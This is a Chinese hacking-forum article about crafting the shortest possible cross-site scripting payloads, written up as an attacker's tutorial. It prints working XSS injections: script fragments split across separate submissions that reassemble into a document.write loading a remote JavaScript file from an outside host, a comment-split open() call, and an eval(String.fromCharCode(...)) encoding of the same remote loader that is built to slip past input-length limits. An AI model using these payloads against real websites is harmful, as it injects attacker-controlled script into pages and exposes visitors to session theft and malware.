寻找最短的跨站代码(by jmdcw) - 中华隐士黑客联盟,全国最大的免费黑客技术培训基地! 免费一切,共享一切!

寻找最短的跨站代码(by jmdcw)

那天剑心问我，最短的跨站语句是多少？要放在以前，我一定会这样想，正常的跨站代码：<script>alert("a")</script> ，查一下，一共27个字符。嘿嘿，不过，这之前我在《黑客手册》上看到了他的一篇文章，《疯狂的跨站之行》，在这其中提到了跨站语句的另一种方法：
<script>z=’document.’</script>
<script>z=z+’write("’</script>
<script>z=z+’<script’</script>
<script>z=z+’ src=ht’</script>
<script>z=z+’tp://ww’</script>
<script>z=z+’w.pc010’</script>
<script>z=z+’.cn/1.’</script>
<script>z=z+’js></sc’</script>
<script>z=z+’ript>")’</script>
<script>eval(z)</script>

       将这些语句分别写入，只要所写入的语句在一个页面中显示，那么这些代码最后就会引入到变量z中，总到一块就是：
document.write("<script src=http://www.pc010.cn/1.js></script>")

       然后用eval()函数来执行这个z变量，就可以执行出跨站效果了。lcx在文章的评论中说，最小的有效利用代码可以是26个字母，就是<script>z=z+’d"’</script>，答案不就出来了，最小的跨站是26个字符。（今天在网上查找资料时，发现利用这种方法还可以少一个字符，就是：<script>z+=’d"’</script>，用+=来代替=z+，嘿嘿，又可以减少一个字符，25个字符，不过，也好伤心，我好像只能在别人的基础上面有所突破！:( ）。回复剑心后，他竟回了一个笑脸，我感觉这家伙一定又找出了更短的跨站方法。/jmdcw/

       果不其然，今天翻开《黑客手册》第九期中的《phpwind漏洞之行》（因为一些原因，好久没有仔细看过书了），在其中提到了更短的跨站代码，如下：

<script>open(/*
*/"http://127"/*
*/+".0.0.1/"/*
*/)</script>

       这其中的/*和*/是script的注释语句，将这些语句分别提交，同样的条件是这些提交的代码必须在一个页面中，这样最后所显示的就是：

<script>open(/*不会显示的无效内容*/"http://127"/*不会显示的无效内容*/+".0.0.1/"/*不会显示的无效内容*/)</script>

       那么这个的最短的语句是多少呢？貌似<script>不能分开应用，除了这个，script所定义的函数比如open之类的，好像分开后也不能正常运行了，/jmdcw/这样的话，

       先将最上面的语句：document.write("<script src=http://www.pc010.cn/1.js></script>") 转为10进制表示字符：

100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,34,60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,119,119,119,46,112,99,48,49,48,46,99,110,47,49,46,106,115,62,60,47,115,99,114,105,112,116,62,34,41,59

       然后用eval加String.fromCharCode来执行：<script>eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,34,60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,119,119,119,46,112,99,48,49,48,46,99,110,47,49,46,106,115,62,60,47,115,99,114,105,112,116,62,34,41,59))</script>

       下面就用剑心的方法来进行拆分：
<script>/*
*/eval(/*
*/String/*
*/./*
*/fromCharCode/*
*/(100,/*
*/111,99,/*
*/......./*
*/59))/*
*/</script>

       中间的....表示的字符和前面的一样，这其中最长的一个语句是：*/fromCharCode/*    ，16个字符，因为这是script自已保留的函数名，拆分的话，就不能运行了，由此可以看出，最小的跨站语句是由所采用的函数来定的。

     BY 寂寞的刺猬

黑客软件：	漏洞扫描 \| 木马间谍 \| 加密解密 \| 远程控制 \| 破坏攻击 \| 杀毒软件 \| 防火墙类 \| OICQ专区 \| 黑客必备 \| 常用工具 \| 网吧攻击
文章中心：	最新资讯 \| 黑客技术 \| 电脑基础 \| 菜鸟文摘 \| 网络安全 \| 网络技巧 \| QQ技巧 \| OQ空间代码 \| 免费资源 \| 编程世界 \| 建站技术
素材源码：	论坛相关 \| ASP源码 \| CGI 源码 \| NET 源码 \| PHP 源码 \| 酷站素材 \| 字体素材 \| 图片素材 \| 友情发布 \| 网页模版 \| 建站软件
教程动画：	黑客教程 \| 黑客编程 \| 网站入侵 \| 菜鸟教程 \| 入侵教程 \| 破解教程 \| 电子书籍 \| 网页制作 \| 高级会员 \| 综合教程 \| 本站原创